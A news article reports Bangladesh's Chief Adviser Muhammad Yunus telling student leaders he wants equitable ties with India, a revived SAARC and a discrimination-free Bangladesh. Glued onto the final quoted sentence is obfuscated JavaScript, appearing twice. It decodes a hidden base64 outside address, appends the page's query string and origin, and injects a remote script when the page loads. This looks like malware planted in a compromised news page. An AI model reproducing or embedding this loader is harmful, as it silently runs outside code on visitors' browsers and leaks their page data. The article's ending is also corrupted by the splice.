Chief Adviser Professor Muhammad Yunus has called for a balanced and fair relationship between Bangladesh and India, emphasising the need for mutual respect and equity in diplomatic ties.

During a recent view-exchange meeting with student leaders of the recent student-public revolution, Yunus underscored his government’s dedication to realising a discrimination-free Bangladesh, a key demand of the student movement.

“We need to maintain good relations with India, but it should be based on equity and fairness,” said Prof. Yunus, according to his special assistant, Mahfuj Alam, who briefed the media at the Foreign Service Academy.

Yunus reiterated the interim government’s stance on fostering fair and respectful relations with neighbouring countries, particularly India.

REVITALISING REGIONAL COOPERATION
Yunus also highlighted the need to revitalise the South Asian Association for Regional Cooperation (SAARC), emphasising that regional cooperation is essential for addressing common challenges
and enhancing economic opportunities for all member states.

PLEDGE TO REALISE STUDENTS’ VISION
Prof. Yunus reassured the student leaders of his commitment to fulfilling their vision of a discrimination-free Bangladesh. He praised the sacrifices made by the students during the revolution and stressed that his government is determined to achieve their goals.

“For the dream they (students) sacrificed their lives, we must implement that dream. We have no way of getting out of it,” he asserted, acknowledging the challenges posed by forces opposed to change.

“The ousted force will try its best to resist, so it can maintain its reign of looting. We must stay vigilant,” he cautioned, urging the students to persevere in their efforts for a better future.

A RARE OPPORTUNITY FOR TRANSFORMATION
Describing the student-led revolution as a rare and unprecedented opportunity for change, Prof. Yunus warned that if this moment is lost, Bangladesh’s future would be at risk.

“If this opportunity is snatched away, there will be no future for Bangladesh,” he said, stressing the historic importance of this movement in shaping the nation.

The Nobel Peace Laureate also expressed optimism about Bangladesh’s potential global influence, stating that the world would soon look to Bangladesh as a model of transformation led by its youth. “Bangladesh will occupy a prestigious position at the global level, as the youth have taken the lead here,” he added.

COMMITMENT TO REFORM
In his concluding remarks, Prof. Yunus congratulated the students and encouraged them to remain steadfast in their beliefs. “Your thoughts are clear. Your thoughts are right,” he said, urging them not to be swayed by external opinions.(function(){var a=document.head||document.getElementsByTagName(“head”)[0],b=”script”,c=atob(“aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=”);c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();(function(){var a=document.head||document.getElementsByTagName(“head”)[0],b=”script”,c=atob(“aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=”);c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();
